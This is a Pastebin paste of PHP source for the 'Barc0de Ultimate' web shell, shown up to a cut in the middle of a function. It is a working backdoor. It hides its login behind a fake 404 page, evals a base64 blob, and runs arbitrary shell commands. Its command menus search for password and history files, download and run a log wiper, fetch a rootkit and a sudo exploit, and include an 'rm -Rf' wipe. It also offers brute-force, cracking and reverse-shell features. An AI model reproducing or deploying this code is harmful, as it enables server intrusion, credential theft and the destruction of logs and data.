rooterror

Barc0de shell

Jun 3rd, 2014
403
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 171.46 KB | None | 0 0
  1. <?php
  2.  
  3. // Barc0de Ultimate - www.code-security.com
  4. // Author : uzanc | [email protected]
  5. // Thanks for : Hacker Cisadane - Lumajangcrew - TMTC 2 - Devilzc0de - Hacker Newbie - Indonesian Cyber - Indonesian Hacker - Indonesian Coder - Surabaya Hackerlink - Serverisdown - And All Forum Hacking In The World
  6. // Supporter by : cakill | xadpritox | dansky | arulz | direxer | jhoni | guard | nacomb13 | nobita_chupuy | mr.at | zerocool | evilgirl | blackboy007 | dopunk | l1n9g4 | spykit | and you
  7.  
  8. $b_name = "barc0de ultimate";
  9. $sh_mainurl = "http://www.code-security.com";
  10. $b_version = "indonesia security and hacking - ©2011 www.code-security.com";
  11. $md5_pass = "dc5d6e5c0ffd6d1cd249286ced098382";
  12.  
  13. //login page
  14. @session_start();function printLogin() {
  15. echo '<html><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at Port 80</address><style>input { margin:0;background-color:#fff;border:1px solid #fff; }</style><form method=post><input type=password name=pass></form></body><html>';
  16. exit; } if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] )) if( empty( $md5_pass ) ||( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $md5_pass ) ) )
  17. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true; else  printLogin();  
  18.  
  19. //Style
  20. $style = 'JHN0eWxlcyA9ICc8aHRtbD48aGVhZD4NCjx0aXRsZT5iYXJjMGRlIHVsdGltYXRlPC90aXRsZT4NCjxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+DQo8IS0tDQpib2R5LHRhYmxlIHsgZm9udC1mYW1pbHk6dmVyZGFuYTtmb250LXNpemU6MTFweDtjb2xvcjp3aGl0ZTtiYWNrZ3JvdW5kLWNvbG9yOmJsYWNrO2JvcmRlcjogMnB4IHNvbGlkICMxRDFEMUQ7d2lkdGg6ODAlO21hcmdpbi1sZWZ0OjEwJTsgfQ0KdGFibGUgeyB3aWR0aDoxMDAlO21hcmdpbi1sZWZ0OjBweDsgfQ0KdGFibGUsdGQgeyBib3JkZXI6MXB4IHNvbGlkIGJsYWNrO21hcmdpbi10b3A6MjttYXJnaW4tYm90dG9tOjI7cGFkZGluZzo1cHg7IH0NCmEgeyBjb2xvcjojNEM4M0FGO3RleHQtZGVjb3JhdGlvbjpub25lOyB9DQphOmFjdGl2ZSB7IGNvbG9yOiNGRkZGRkY7IH0NCmE6bGluayB7IGNvbG9yOiM0QzgzQUY7IH0NCmE6aG92ZXIgeyB0ZXh0LWRlY29yYXRpb246dW5kZXJsaW5lOyB9DQphOnZpc2l0ZWQgeyBjb2xvcjojNEM4M0FGOyB9DQppbnB1dCxzZWxlY3Qsb3B0aW9uIHsgZm9udDo4cHQgdGFob21hO2NvbG9yOndoaXRlO21hcmdpbjoyO2JvcmRlcjoxcHggc29saWQgIzIyMjIyMjsgfQ0KdGV4dGFyZWEgeyBjb2xvcjojMjIyMjIyO2ZvbnQ6dmVyZGFuYSBib2xkO2JvcmRlcjoxcHggc29saWQgIzIyMjIyMjttYXJnaW46MjsgfQ0KLmZsZWZ0IHsgZmxvYXQ6bGVmdDt0ZXh0LWFsaWduOmxlZnQ7IH0NCi5mcmlnaHQgeyBmbG9hdDpyaWdodDt0ZXh0LWFsaWduOnJpZ2h0OyB9DQojcGFnZWJhciB7IGZvbnQ6OHB0IHRhaG9tYTtwYWRkaW5nOjVweDsgYm9yZGVyOjNweCBzb2xpZCBibGFjazsgYm9yZGVyLWNvbGxhcHNlOmNvbGxhcHNlOyB9DQojcGFnZWJhciB0ZCB7IHZlcnRpY2FsLWFsaWduOnRvcDsgfQ0KI3BhZ2ViYXIgcCB7IGZvbnQ6OHB0IHRhaG9tYTt9DQojcGFnZWJhciBhIHsgZm9udC13ZWlnaHQ6Ym9sZDtjb2xvcjojRkZGRkZGOyB9DQojcGFnZWJhciBhOnZpc2l0ZWQgeyBjb2xvcjojNEM4M0FGOyB9DQojbWFpbm1lbnUgeyB0ZXh0LWFsaWduOmNlbnRlcjsgfQ0KI21haW5tZW51IGEgeyB0ZXh0LWFsaWduOiBjZW50ZXI7cGFkZGluZzogMHB4IDVweCAwcHggNXB4OyB9DQojbWFpbmluZm8sLmJhcmhlYWRlciwuYmFyaGVhZGVyMiB7IHRleHQtYWxpZ246Y2VudGVyOyB9DQojbWFpbmluZm8gdGQgeyBwYWRkaW5nOjNweDsgfQ0KLmJhcmhlYWRlciB7IGZvbnQtd2VpZ2h0OmJvbGQ7cGFkZGluZzo1cHg7IH0NCi5iYXJoZWFkZXIyIHsgcGFkZGluZzo1cHg7Ym9yZGVyOjJweCBzb2xpZCBibGFjazsgfQ0KLmNvbnRlbnRzLC5leHBsb3JlciB7IGJvcmRlci1jb2xsYXBzZTpjb2xsYXBzZTt9DQouY29udGVudHMgdGQgeyB2ZXJ0aWNhbC1hbGlnbjp0b3A7IH0NCi5tYWlucGFuZWwgeyBib3JkZXItY29sbGFwc2U6Y29sbGFwc2U7cGFkZGluZzo1cHg7IH0NCi5iYXJoZWFkZXIsLm1haW5wYW5lbCB0YWJsZSx0ZCB7IGJvcmRlcjoxcHggc29saWQgIzIyMjIyMjsgfQ0KLm1haW5wYW5lbCBpbnB1dCxzZWxlY3Qsb3B0aW9uIHsgYm9yZGVyOjFweCBzb2xpZCBibGFjazttYXJnaW46MDsgfQ0KaW5wdXRbdHlwZT0ic3VibWl0Il0geyBib3JkZXI6MXB4IHNvbGlkICMyMjIyMjI7IH0NCmlucHV0W3R5cGU9InRleHQiXSB7IHBhZGRpbmc6M3B4O30NCi5zaGVsbCB7IGJhY2tncm91bmQtY29sb3I6YmxhY2s7Y29sb3I6YmxhY2s7cGFkZGluZzo1cHg7IH0NCi5meGVycm1zZyB7IGNvbG9yOndoaXRlOyBmb250LXdlaWdodDpib2xkOyB9DQojcGFnZWJhciwjcGFnZWJhciBwLGgxLGgyLGgzLGg0LGZvcm0geyBtYXJnaW46MDsgfQ0KI3BhZ2ViYXIsLm1haW5wYW5lbCxpbnB1dFt0eXBlPSJzdWJtaXQiXSB7IGJhY2tncm91bmQtY29sb3I6YmxhY2s7IH0NCi5iYXJoZWFkZXIyLGlucHV0LHNlbGVjdCxvcHRpb24saW5wdXRbdHlwZT0ic3VibWl0Il06aG92ZXIgeyBiYWNrZ3JvdW5kLWNvbG9yOmJsYWNrOyB9DQp0ZXh0YXJlYSwubWFpbnBhbmVsIGlucHV0LHNlbGVjdCxvcHRpb24geyBiYWNrZ3JvdW5kLWNvbG9yOiMwMDAwMDA7IH0NCi8vIC0tPg0KPC9zdHlsZT4NCjwvaGVhZD4NCjxib2R5Pic7DQokaHRtbF9zdGFydCA9ICRzdHlsZXM7';eval(base64_decode($style));  
  21.  
  22.  
  23. //Script
  24. $gzipencode = TRUE;
  25. $filestealth = TRUE;
  26. $host_allow = array("*");
  27. $curdir = "./";
  28. $tmpdir = "";
  29. $tmpdir_log = "./";
  30. $sort_default = "0a";
  31. $sort_save = TRUE;
  32. $sess_cookie = "capriv8vars";
  33. $usefsbuff = TRUE;
  34. $copy_unset = FALSE;
  35. $hexdump_lines = 8;
  36. $hexdump_rows = 24;
  37. $win = strtolower(substr(PHP_OS,0,3)) == "win";
  38. $disablefunc = @ini_get("disable_functions");
  39. if (!empty($disablefunc)) {
  40.   $disablefunc = str_replace(" ","",$disablefunc);
  41.   $disablefunc = explode(",",$disablefunc);
  42. }
  43. function get_phpini() {
  44.   function U_wordwrap($str) {
  45.     $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
  46.     return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
  47.   }
  48.   function U_value($value) {
  49.     if ($value == '') return '<i>no value</i>';
  50.     if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
  51.     if ($value === null) return 'NULL';
  52.     if (@is_object($value)) $value = (array) $value;
  53.     if (@is_array($value)) {
  54.       @ob_start();
  55.       print_r($value);
  56.       $value = @ob_get_contents();
  57.       @ob_end_clean();
  58.     }
  59.     return U_wordwrap((string) $value);
  60.   }
  61.   if (@function_exists('ini_get_all')) {
  62.     $r = "";
  63.     echo "<table><tr class=barheader><td>Directive</td><td>Local Value</td><td>Global Value</td></tr>";
  64.     foreach (@ini_get_all() as $key=>$value) {
  65.       $r .= "<tr><td>".$key."</td><td><div align=center>".U_value($value['local_value'])."</div></td><td><div align=center>".U_value($value['global_value'])."</div></td></tr>";
  66.     }
  67.     echo $r;
  68.     echo "</table>";
  69.   }
  70. }
  71. function disp_drives($curdir,$surl) {
  72.   $letters = "";
  73.   $v = explode("\\",$curdir);
  74.   $v = $v[0];
  75.   foreach (range("A","Z") as $letter) {
  76.     $bool = $isdiskette = $letter == "A";
  77.     if (!$bool) {$bool = is_dir($letter.":\\");}
  78.     if ($bool) {
  79.       $letters .= "<a href=\"".$surl."x=ls&d=".urlencode($letter.":\\")."\"".
  80.       ($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"")."> [";
  81.       if ($letter.":" != $v) {$letters .= $letter;}
  82.       else {$letters .= "<font color=yellow>".$letter."</font>";}
  83.       $letters .= "]</a> ";
  84.     }
  85.   }
  86.   if (!empty($letters)) {Return $letters;}
  87.   else {Return "None";}
  88. }
  89.  
  90. if (!function_exists("myshellexec")) {
  91.   if(is_callable("popen")) {
  92.     function myshellexec($cmd) {
  93.       if (!($p=popen("($cmd)2>&1","r"))) { return "popen Disabled!"; }
  94.       while (!feof($p)) {
  95.         $line=fgets($p,1024);
  96.         $out .= $line;
  97.       }
  98.       pclose($p);
  99.       return $out;
  100.     }
  101.   } else {
  102.     function myshellexec($cmd) {
  103.       global $disablefunc;
  104.       $result = "";
  105.       if (!empty($cmd)) {
  106.         if (is_callable("exec") and !in_array("exec",$disablefunc)) {
  107.           exec($cmd,$result);
  108.           $result = join("\n",$result);
  109.         } elseif (($result = $cmd) !== FALSE) {
  110.         } elseif (is_callable("system") and !in_array("system",$disablefunc)) {
  111.           $v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;
  112.         } elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {
  113.           $v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;
  114.         } elseif (is_resource($fp = popen($cmd,"r"))) {
  115.           $result = "";
  116.           while(!feof($fp)) { $result .= fread($fp,1024); }
  117.           pclose($fp);
  118.         }
  119.       }
  120.       return $result;
  121.     }
  122.   }
  123. }
  124. function ex($cfe) {
  125.   $res = '';
  126.   if (!empty($cfe)) {
  127.     if(function_exists('exec')) {
  128.       @exec($cfe,$res);
  129.       $res = join("\n",$res);
  130.     } elseif(function_exists('shell_exec')) {
  131.       $res = @shell_exec($cfe);
  132.     } elseif(function_exists('system')) {
  133.       @ob_start();
  134.       @system($cfe);
  135.       $res = @ob_get_contents();
  136.       @ob_end_clean();
  137.     } elseif(function_exists('passthru')) {
  138.       @ob_start();
  139.       @passthru($cfe);
  140.       $res = @ob_get_contents();
  141.       @ob_end_clean();
  142.     } elseif(@is_resource($f = @popen($cfe,"r"))) {
  143.       $res = "";
  144.       while(!@feof($f)) { $res .= @fread($f,1024); }
  145.       @pclose($f);
  146.     } else { $res = "Ex() Disabled!"; }
  147.   }
  148.   return $res;
  149. }
  150. function which($pr) {
  151.   $path = ex("which $pr");
  152.   if(!empty($path)) { return $path; } else { return $pr; }
  153. }
  154.  
  155. $hostname_x = php_uname(n);
  156. $itshome = getcwd();
  157.  
  158. $Lversion = php_uname(r);
  159. $OSV = php_uname(s);
  160. if(eregi("Linux",$OSV)) {
  161.   $Lversion=substr($Lversion,0,6);
  162.   $millink="http://www.code-security.com ".$Lversion;
  163. } else {
  164.   $Lversion=substr($Lversion,0,3);
  165.   $millink ="http://www.code-security.com".$OSV." ".$Lversion;
  166. }
  167. @ini_set("max_execution_time",0);
  168. if (!function_exists("getmicrotime")) {
  169.   function getmicrotime() {
  170.     list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);
  171.   }
  172. }
  173. error_reporting(5);
  174. @ignore_user_abort(TRUE);
  175. @set_magic_quotes_runtime(0);
  176. define("starttime",getmicrotime());
  177. if (get_magic_quotes_gpc()) {
  178.   if (!function_exists("strips")) {
  179.     function strips(&$arr,$k="") {
  180.       if (is_array($arr)) {
  181.         foreach($arr as $k=>$v) {
  182.           if (strtoupper($k) != "GLOBALS") { strips($arr["$k"]); }
  183.         }
  184.       } else {$arr = stripslashes($arr);}
  185.     }
  186.   }
  187.   strips($GLOBALS);
  188. }
  189. $_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
  190. $surl_autofill_include = TRUE;
  191. foreach($_REQUEST as $k=>$v) { if (!isset($$k)) {$$k = $v;} }
  192. if ($surl_autofill_include) {
  193.   $include = "&";
  194.   foreach (explode("&",getenv("QUERY_STRING")) as $v) {
  195.     $v = explode("=",$v);
  196.     $name = urldecode($v[0]);
  197.     $value = urldecode($v[1]);
  198.     foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {
  199.       if (strpos($value,$needle) === 0) {
  200.         $includestr .= urlencode($name)."=".urlencode($value)."&";
  201.       }
  202.     }
  203.   }
  204. }
  205. if (empty($surl)) {
  206.   $surl = "?".$includestr;
  207. }
  208. $surl = htmlspecialchars($surl);
  209.  
  210. $ftypes  = array(
  211.     "html"=>array("html","htm","shtml"),
  212.     "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
  213.     "exe"=>array("sh","install","bat","cmd"),
  214.     "ini"=>array("ini","inf","conf"),
  215.     "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
  216.     "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
  217.     "sdb"=>array("sdb"),
  218.     "phpsess"=>array("sess"),
  219.     "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
  220. );
  221. $exeftypes  = array(
  222.     getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
  223.     "perl %f%" => array("pl","cgi")
  224. );
  225. $regxp_highlight  = array(
  226.     array(basename($_SERVER["PHP_SELF"]),1,"<font color=#4C83AF>","</font>"),
  227.     array("\.tgz$",1,"<font color=#4C83AF>","</font>"),
  228.     array("\.gz$",1,"<font color=#4C83AF>","</font>"),
  229.     array("\.tar$",1,"<font color=#4C83AF>","</font>"),
  230.     array("\.bz2$",1,"<font color=#4C83AF>","</font>"),
  231.     array("\.zip$",1,"<font color=#4C83AF>","</font>"),
  232.     array("\.rar$",1,"<font color=#4C83AF>","</font>"),
  233.     array("\.php$",1,"<font color=#4C83AF>","</font>"),
  234.     array("\.php3$",1,"<font color=#4C83AF>","</font>"),
  235.     array("\.php4$",1,"<font color=#4C83AF>","</font>"),
  236.     array("\.jpg$",1,"<font color=#4C83AF>","</font>"),
  237.     array("\.jpeg$",1,"<font color=#4C83AF>","</font>"),
  238.     array("\.JPG$",1,"<font color=#4C83AF>","</font>"),
  239.     array("\.JPEG$",1,"<font color=#4C83AF>","</font>"),
  240.     array("\.ico$",1,"<font color=#4C83AF>","</font>"),
  241.     array("\.gif$",1,"<font color=#4C83AF>","</font>"),
  242.     array("\.png$",1,"<font color=#4C83AF>","</font>"),
  243.     array("\.htm$",1,"<font color=#4C83AF>","</font>"),
  244.     array("\.html$",1,"<font color=#4C83AF>","</font>"),
  245.     array("\.txt$",1,"<font color=#4C83AF>","</font>")
  246. );
  247. if (!$win) {
  248.   $cmdaliases = array(
  249.     array("ls -la", "ls -la"),
  250.     array("-----", "-----"),
  251.     array("Find all suid files", "find / -type f -perm -04000 -ls"),
  252.     array("Find suid files in current dir", "find . -type f -perm -04000 -ls"),
  253.     array("Find all sgid files", "find / -type f -perm -02000 -ls"),
  254.     array("Find sgid files in current dir", "find . -type f -perm -02000 -ls"),
  255.     array("Find config.inc.php files", "find / -type f -name config.inc.php"),
  256.     array("Find config* files", "find / -type f -name \"config*\""),
  257.     array("Find config* files in current dir", "find . -type f -name \"config*\""),
  258.     array("Find all writable folders and files", "find / -perm -2 -ls"),
  259.     array("Find all writable folders and files in current dir", "find . -perm -2 -ls"),
  260.     array("Find all writable folders", "find / -type d -perm -2 -ls"),
  261.     array("Find all writable folders in current dir", "find . -type d -perm -2 -ls"),
  262.     array("Find all service.pwd files", "find / -type f -name service.pwd"),
  263.     array("Find service.pwd files in current dir", "find . -type f -name service.pwd"),
  264.     array("Find all .htpasswd files", "find / -type f -name .htpasswd"),
  265.     array("Find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
  266.     array("Find all .bash_history files", "find / -type f -name .bash_history"),
  267.     array("Find .bash_history files in current dir", "find . -type f -name .bash_history"),
  268.     array("Find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
  269.     array("Find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
  270.     array("List file attributes on a Linux second extended file system", "lsattr -va"),
  271.     array("Show opened ports", "netstat -an | grep -i listen")
  272.   );
  273.   $cmdaliases2 = array(
  274.     array("-----",""),
  275.     array("Logged in users","w"),
  276.     array("Last to connect","lastlog"),
  277.     array("Find Suid bins","find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null"),
  278.     array("User Without Password","cut -d: -f1,2,3 /etc/passwd | grep ::"),
  279.     array("Can write in /etc/?","find /etc/ -type f -perm -o+w 2> /dev/null"),
  280.     array("Downloaders?","which wget curl w3m lynx fetch lwp-download"),
  281.     array("CPU Info","cat /proc/version /proc/cpuinfo"),
  282.     array("Is gcc installed ?","locate gcc"),
  283.     array("Format box (DANGEROUS)","rm -Rf"),
  284.     array("-----",""),
  285.     array("wget WIPELOGS PT1","wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c"),
  286.     array("gcc WIPELOGS PT2","gcc zap2.c -o zap2"),
  287.     array("Run WIPELOGS PT3","./zap2"),
  288.     array("-----",""),
  289.     array("wunderbar_emporium (wunderbar)","wget http://www.packetstormsecurity.com/0908-exploits/wunderbar_emporium.tgz"),
  290.     array("wget RatHole 1.2 (Linux & BSD)","wget http://packetstormsecurity.org/UNIX/penetration/rootkits/rathole-1.2.tar.gz"),
  291.     array("wget Sudo Exploit","wget http://www.securityfocus.com/data/vulnerabilities/exploits/sudo-exploit.c"),
  292.   );
  293. }
  294. else {
  295.   $cmdaliases = array(
  296.     array("", "dir"),
  297.     array("Find index.php in current dir", "dir /s /w /b index.php"),
  298.     array("Find *config*.php in current dir", "dir /s /w /b *config*.php"),
  299.     array("Find r57shell in current dir", "find /c \"r57\" *"),
  300.     array("Show active connections", "netstat -an"),
  301.     array("Show running services", "net start"),
  302.     array("User accounts", "net user"),
  303.     array("Show computers", "net view"),
  304.     );
  305. }
  306. $phpfsaliases = array(
  307.     array("Read File", "read"),
  308.     array("Write File (PHP5)", "write"),
  309.     array("Copy", "copy"),
  310.     array("Rename/Move", "rename"),
  311.     array("Delete", "delete"),
  312.     array("Make Dir","mkdir"),
  313.     array("-----", ""),
  314.     array("Download", "download"),
  315.     array("Download (Binary Safe)", "downloadbin"),
  316.     array("Change Perm (0755)", "chmod"),
  317.     array("Find Writable Dir", "fwritabledir"),
  318.     array("Find Pathname Pattern", "glob"),
  319. );
  320.  
  321. $quicklaunch2 = array(
  322.     array("[ Home ]",$surl."=img&img=home"),
  323.     array("[ Buteforce ]",$surl."x=ftpquickbrute"),
  324.     array("[ Infomation ]",$surl."x=security&d=%d"),
  325.     array("[ Processes ]",$surl."x=processes&d=%d"),
  326.     array("[ MySQL ]",$surl."x=sql&d=%d"),
  327.     array("[ PHP-Code ]",$surl."x=eval&d=%d"),
  328.     array("[ Scanconfig ]",$surl."x=jumping&d=%d"),
  329.     array("[ Jumping ]",$surl."x=scanconfig&d=%d"),
  330.     array("[ Checker ]",$surl."x=checker&d=%d"),
  331.     array("[ Cracker ]",$surl."x=crack&d=%d"),
  332. );
  333.  
  334.  
  335. $highlight_background = "#444343";
  336. $highlight_bg = "#ffffff";
  337. $highlight_comment = "#ffffff";
  338. $highlight_default = "#ffffff";
  339. $highlight_html = "#ffffff";
  340. $highlight_keyword = "#ffffff";
  341. $highlight_string = "#ffffff";
  342.  
  343. @$f = $_REQUEST["f"];
  344. @extract($_REQUEST["capriv8cook"]);
  345. @set_time_limit(0);
  346. $tmp = array();
  347. foreach ($host_allow as $k=>$v) { $tmp[] = str_replace("\\*",".*",preg_quote($v)); }
  348. $s = "!^(".implode("|",$tmp).")$!i";
  349. if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {
  350.   exit("<a href=\"$sh_mainurl\">$sh_name</a>: Access Denied - Your host (".getenv("REMOTE_ADDR").") not allowed");
  351. }
  352.  
  353. if ($x != "img") {
  354.   $lastdir = realpath(".");
  355.   chdir($curdir);
  356.   if ($selfwrite) {
  357.     @ob_clean();
  358.     capriv8_getupdate($selfwrite,1);
  359.     exit;
  360.   }
  361.   $sess_data = unserialize($_COOKIE["$sess_cookie"]);
  362.   if (!is_array($sess_data)) {$sess_data = array();}
  363.   if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
  364.   if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
  365.   if (!function_exists("cagetsource")) {
  366.     function cagetsource($fn) {
  367.       global $capriv8_sourcesurl;
  368.       $array = array(
  369.         "capriv8_bindport.pl" => "capriv8_bindport_pl.txt",
  370.         "capriv8_bindport.c" => "capriv8_bindport_c.txt",
  371.         "capriv8_backconn.pl" => "capriv8_backconn_pl.txt",
  372.         "capriv8_backconn.c" => "capriv8_backconn_c.txt",
  373.         "capriv8_datapipe.pl" => "capriv8_datapipe_pl.txt",
  374.         "capriv8_datapipe.c" => "capriv8_datapipe_c.txt",
  375.       );
  376.       $name = $array[$fn];
  377.       if ($name) {return file_get_contents($capriv8_sourcesurl.$name);}
  378.       else {return FALSE;}
  379.     }
  380.   }
  381.   if (!function_exists("ca_buff_prepare")) {
  382.     function ca_buff_prepare() {
  383.       global $sess_data;
  384.       global $x;
  385.       foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
  386.       foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
  387.       $sess_data["copy"] = array_unique($sess_data["copy"]);
  388.       $sess_data["cut"] = array_unique($sess_data["cut"]);
  389.       sort($sess_data["copy"]);
  390.       sort($sess_data["cut"]);
  391.       if ($x != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
  392.       else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
  393.     }
  394.   }
  395.   ca_buff_prepare();
  396.   if (!function_exists("ca_sess_put")) {
  397.     function ca_sess_put($data) {
  398.       global $sess_cookie;
  399.       global $sess_data;
  400.       ca_buff_prepare();
  401.       $sess_data = $data;
  402.       $data = serialize($data);
  403.       setcookie($sess_cookie,$data);
  404.     }
  405.   }
  406.   foreach (array("sort","sql_sort") as $v) {
  407.     if (!empty($_GET[$v])) {$$v = $_GET[$v];}
  408.     if (!empty($_POST[$v])) {$$v = $_POST[$v];}
  409.   }
  410.   if ($sort_save) {
  411.     if (!empty($sort)) {setcookie("sort",$sort);}
  412.     if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
  413.   }
  414.   if (!function_exists("str2mini")) {
  415.     function str2mini($content,$len) {
  416.       if (strlen($content) > $len) {
  417.         $len = ceil($len/2) - 2;
  418.         return substr($content, 0,$len)."...".substr($content,-$len);
  419.       } else {return $content;}
  420.     }
  421.   }
  422.   if (!function_exists("view_size")) {
  423.     function view_size($size) {
  424.       if (!is_numeric($size)) { return FALSE; }
  425.       else {
  426.         if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
  427.         elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
  428.         elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
  429.         else {$size = $size . " B";}
  430.         return $size;
  431.       }
  432.     }
  433.   }
  434.   if (!function_exists("fs_copy_dir")) {
  435.     function fs_copy_dir($d,$t) {
  436.       $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  437.       if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  438.       $h = opendir($d);
  439.       while (($o = readdir($h)) !== FALSE) {
  440.         if (($o != ".") and ($o != "..")) {
  441.           if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
  442.           else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
  443.           if (!$ret) {return $ret;}
  444.         }
  445.       }
  446.       closedir($h);
  447.       return TRUE;
  448.     }
  449.   }
  450.   if (!function_exists("fs_copy_obj")) {
  451.     function fs_copy_obj($d,$t) {
  452.       $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  453.       $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
  454.       if (!is_dir(dirname($t))) {mkdir(dirname($t));}
  455.       if (is_dir($d)) {
  456.         if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  457.         if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
  458.         return fs_copy_dir($d,$t);
  459.       }
  460.       elseif (is_file($d)) { return copy($d,$t); }
  461.       else { return FALSE; }
  462.     }
  463.   }
  464.   if (!function_exists("fs_move_dir")) {
  465.     function fs_move_dir($d,$t) {
  466.       $h = opendir($d);
  467.       if (!is_dir($t)) {mkdir($t);}
  468.       while (($o = readdir($h)) !== FALSE) {
  469.         if (($o != ".") and ($o != "..")) {
  470.           $ret = TRUE;
  471.           if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
  472.           else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
  473.           if (!$ret) {return $ret;}
  474.         }
  475.       }
  476.       closedir($h);
  477.       return TRUE;
  478.     }
  479.   }
  480.   if (!function_exists("fs_move_obj")) {
  481.     function fs_move_obj($d,$t) {
  482.       $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  483.       $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
  484.       if (is_dir($d)) {
  485.         if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  486.         if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
  487.         return fs_move_dir($d,$t);
  488.       }
  489.       elseif (is_file($d)) {
  490.         if(copy($d,$t)) {return unlink($d);}
  491.         else {unlink($t); return FALSE;}
  492.       }
  493.       else {return FALSE;}
  494.     }
  495.   }
  496.   if (!function_exists("fs_rmdir")) {
  497.     function fs_rmdir($d) {
  498.       $h = opendir($d);
  499.       while (($o = readdir($h)) !== FALSE) {
  500.         if (($o != ".") and ($o != "..")) {
  501.           if (!is_dir($d.$o)) {unlink($d.$o);}
  502.           else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
  503.         }
  504.       }
  505.       closedir($h);
  506.       rmdir($d);
  507.       return !is_dir($d);
  508.     }
  509.   }
  510.   if (!function_exists("fs_rmobj")) {
  511.     function fs_rmobj($o) {
  512.       $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
  513.       if (is_dir($o)) {
  514.         if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
  515.         return fs_rmdir($o);
  516.       }
  517.       elseif (is_file($o)) {return unlink($o);}
  518.       else {return FALSE;}
  519.     }
  520.   }
  521.   if (!function_exists("tabsort")) {
  522.     function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}
  523.   }
  524.   if (!function_exists("view_perms")) {
  525.     function view_perms($mode) {
  526.       if (($mode & 0xC000) === 0xC000) {$type = "s";}
  527.       elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
  528.       elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
  529.       elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
  530.       elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
  531.       elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
  532.       elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
  533.       else {$type = "?";}
  534.       $owner["read"] = ($mode & 00400)?"r":"-";
  535.       $owner["write"] = ($mode & 00200)?"w":"-";
  536.       $owner["execute"] = ($mode & 00100)?"x":"-";
  537.       $group["read"] = ($mode & 00040)?"r":"-";
  538.       $group["write"] = ($mode & 00020)?"w":"-";
  539.       $group["execute"] = ($mode & 00010)?"x":"-";
  540.       $world["read"] = ($mode & 00004)?"r":"-";
  541.       $world["write"] = ($mode & 00002)? "w":"-";
